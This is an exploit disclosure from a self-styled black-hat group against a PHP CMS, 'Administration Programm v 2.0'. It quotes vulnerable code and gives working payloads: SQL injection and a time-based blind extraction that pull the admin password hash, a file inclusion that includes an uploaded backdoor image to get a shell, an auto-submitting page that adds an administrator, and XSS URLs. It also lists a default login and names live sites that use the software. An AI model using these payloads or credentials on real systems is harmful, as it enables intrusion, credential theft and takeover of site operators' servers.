======================================================
Vulnerable software: Administration Programm v 2.0
Vendor: europ INNET Web Studio, www.europ-innet.com
======================================================
************************  Vulnerabilities: *************************************



//insert_guest_book.php
==============VULNERABLE CODE SECTION=================

<?
session_start();
ob_start();

if (!isset($_POST['guest_submit']))
	exit();

include('admin/connect.php');
include('admin/api.php');


$name = $_POST['g_name'];
$message = $_POST['g_message'];



if (trim($_POST['g_message']) == '')
{
    header('location:view-page-33-gm-2.html');exit();
}
if ($_SESSION['image_random_value'] != md5($_POST['e_code']))
{
    header('location:view-page-33-gm-3.html');exit();
}


$query = "INSERT INTO `guest_book` SET `name`='".$_POST['g_name']."', `Enable`='0', `message`='".$_POST['g_message']."';";


mysql_query($query,$conn);



header('location:view-page-33-gm-1.html');

?>

============== END OF VULNERABLE CODE SECTION =======================


Exploitation:


Payload: ' or message=(select concat(login,0x7c,password) from us_config limit 1),message=(select concat(login,0x7c,password) from us_config limit 1),enable=1-- AND 0='0


URL: http://192.168.0.15/learn/7878/view-page-33-gm-1.html
REQUEST METHOD: POST


HTTP HEADERS:

Host: 192.168.0.15
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: ASPX=urjgh0qn8jldqigu6hrsqhc5cr4lf80f
Content-Type: application/x-www-form-urlencoded
Content-Length: 449




POST BODY:


g_name=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&g_message=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&e_code=15984&guest_submit=Send




RESULT: You will see credentials like:   developer|0cc175b9c0f1b6a831c399e269772661


Theris also possible to create XSS through SQLi

Payload:

' or message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),enable=1-- AND 0='0



Print Screen: http://s59.radikal.ru/i165/1207/a7/2bd24a646ee3.png



========================================================================


Second:   Blind SQL Injection

We used time based way to obtain credentials (I spent 6 hours of my life to extract completely tables+columns+credentials for password: a)


=========================================================================
//includes/news_subscription.php
<?
session_start();
ob_start();

if (!isset($_POST['email_submit']))
    exit();


$p_email_2 = $_POST['p_email_2'];



$query = "INSERT INTO `users_email_list` SET `users_email`='".$_POST['p_email_2']."';";
mysql_query($query,$conn);


?>
======================END OF VULNERABLE CODE SECTION==================================

Here is that *final* stage of obtaining admin credentials:


developer adli soska xacikin parolunun 1 ci simvolu:
=================================================================
1-ci simvol:  0
//TRUE
email_submit=&p_email_2=' or (select if(substr(`password`,1,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
2-ci simvol:   c
email_submit=&p_email_2=' or (select if(substr(`password`,2,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
3-cu simvol:  c  (yoxla sonra)

email_submit=&p_email_2=' or (select if(substr(`password`,3,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================
4-cu simvol:  1

email_submit=&p_email_2=' or (select if(substr(`password`,4,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
5-ci simvol:   7

email_submit=&p_email_2=' or (select if(substr(`password`,5,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================
6-ci simvol:  5

email_submit=&p_email_2=' or (select if(substr(`password`,6,1)='5',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

7-ci simvol:   b  (yoxla sonra)

email_submit=&p_email_2=' or (select if(substr(`password`,7,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
8-ci simvol:    9 (yoxla sonra)

email_submit=&p_email_2=' or (select if(substr(`password`,8,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
9-cu simvol:   c

email_submit=&p_email_2=' or (select if(substr(`password`,9,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================

10-cu simvol:  0 (yoxla sonra)

email_submit=&p_email_2=' or (select if(substr(`password`,10,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

11-ci simvol:  f

email_submit=&p_email_2=' or (select if(substr(`password`,11,1)='f',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

12-ci simvol:  1  (yoxla sonra server gicliyir nese sehv ola biler netice)

email_submit=&p_email_2=' or (select if(substr(`password`,12,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

13-cu simvol:  b

email_submit=&p_email_2=' or (select if(substr(`password`,13,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

14-cu simvol:  6

email_submit=&p_email_2=' or (select if(substr(`password`,14,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

15-ci simvol: a

email_submit=&p_email_2=' or (select if(substr(`password`,15,1)='a',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

16-ci simvol:  8

email_submit=&p_email_2=' or (select if(substr(`password`,16,1)='8',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

17-ci simvol:  3

email_submit=&p_email_2=' or (select if(substr(`password`,17,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

18-ci simvol:  1

email_submit=&p_email_2=' or (select if(substr(`password`,18,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

19-cu simvol:  c

email_submit=&p_email_2=' or (select if(substr(`password`,19,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

20-ci simvol:   3

email_submit=&p_email_2=' or (select if(substr(`password`,20,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

21-ci simvol:  9

email_submit=&p_email_2=' or (select if(substr(`password`,21,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

22-ci simvol:  9

email_submit=&p_email_2=' or (select if(substr(`password`,22,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

23-cu simvol:  e

email_submit=&p_email_2=' or (select if(substr(`password`,23,1)='e',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

24-cu simvol:  2

email_submit=&p_email_2=' or (select if(substr(`password`,24,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

25-ci simvol:  6 

email_submit=&p_email_2=' or (select if(substr(`password`,25,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
26-ci simvol:   9

email_submit=&p_email_2=' or (select if(substr(`password`,26,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5


=================================================================

27-ci simvol:  7

email_submit=&p_email_2=' or (select if(substr(`password`,27,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

28-ci simvol:  7


email_submit=&p_email_2=' or (select if(substr(`password`,28,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================
29-cu simvol:   2

email_submit=&p_email_2=' or (select if(substr(`password`,29,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

30-cu simvol:   6

email_submit=&p_email_2=' or (select if(substr(`password`,30,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

31-ci simvol:     6

email_submit=&p_email_2=' or (select if(substr(`password`,31,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

32-ci simvol:      1

email_submit=&p_email_2=' or (select if(substr(`password`,32,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5

=================================================================

Login: developer
MD5 HASH: 0cc175b9c0f1b6a831c399e269772661
Pass: a



==================================================================


Local File Inclusion+Exploitation:


//admin/editor.php
===================== BEGIN VULNERABLE CODE SECTION======================
$page=$_GET["page"];

// CALCULATE ACCESS LEVEL
$res=mysql_query("SELECT * FROM `navigation_menu` where Section='".$section."' and Page='".$page."'",$conn);
$arr2=mysql_fetch_array($res);
if($arr2['access_level__Name__Access_Level']!=''){
	$_SESSION['s_admin_access_level']=$arr2['access_level__Name__Access_Level'];
}


/////////////////////////// FIX PAGE
if($page==""){$page="main";}
if(is_file("includes/".$page.".php")==false){$page="main";}


BTW,same code snippet also is vulnerable to SQL injection but it is a bit hard to exploit it because you will get permission error.

You can use this way to obtain others passwords:

http://192.168.0.15/learn/7878/admin/editor.php?page=help%27%20or%20%28select%20if%28substr%28login,1,1%29=%27d%27,sleep%2830%29,0%29%20from%20us_config%20limit%201%29--%20ANd%20999=%27999



====================END OF VULNERABLE CODE SECTION ======================


Goto:
http://site.tld/admin/editor.php?page=images/images

First Upload your backdoor as *.gif file:


Then try to include it like this:


http://site.tld/admin/editor.php?page=../..///db/mea.gif%00

You will get shell there ;)


==========================================================================


CSRF add admin:
Login: akastep
Password: akastep



=================BEGIN EXPLOIT============================================

<!DOCTYPE HTML>
<head>
<title>0day For you.</title>

</head>

<body onload="javascript:document.forms[0].submit()">


<form method="post" action="http://===>CHANGE_TO_TARGET<===/admin/editor.php?page=submit&section=us_config">

<input type="text" name="Full_Name"  value="akastep" />
<select name="access_level__Name__Access_Level">

<option value="">None</option>
<option value="1">Content Manager</option>
<option value="2">Advanced Manager</option>
<option value="3">Administrator</option>
<option value="4">System Administrator</option>
<option value="5" selected>Developer</option>

</select>
<!-- Developer = High Privilegie -->

<input type="text" name="combobox_access_level__Name__Access_Level" value="1" />

<input type="text" name="Email" value="pipi@pipi.tld" />

<input type="text" name="Login" value="akastep">

<input type="text" name="Password_password_cache" value="akastep">
<input type="text" name="Password" value="akastep" />
<input type="checkbox" name="Javascript_Navigation" value="1">

<input type="text" name="id" value="new" />



</form>
</body>
</html>


=================END OF CSRF EXPLOIT===================================



XSS:


http://192.168.0.15/learn/7878/admin/editor.php?section=users_email_list&show_page=18%3Cscript%3Ealert%28%22Enjoy%20With%200day%20xD%22%29;%3C/script%3E



========================================================================
Deafult Password:

We found few .am sites which uses this cms with following credentials:

Login: developer
Password: a
========================================================================

Path Disclosure:

http://192.168.0.15/learn/7878/admin/includes/auth.php


Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 14

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 15 Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 39

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 46

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 49


http://www.europ-innet.com/menu.php

 	
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 8



=========================================================================


==========================================================================

Demo: dsif-am.org

Want more demos?

http://www.europ-innet.com/view-page-8.html

Enjoy)

********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

Thanks + Respect to all friends!

/AkaStep & BOT_25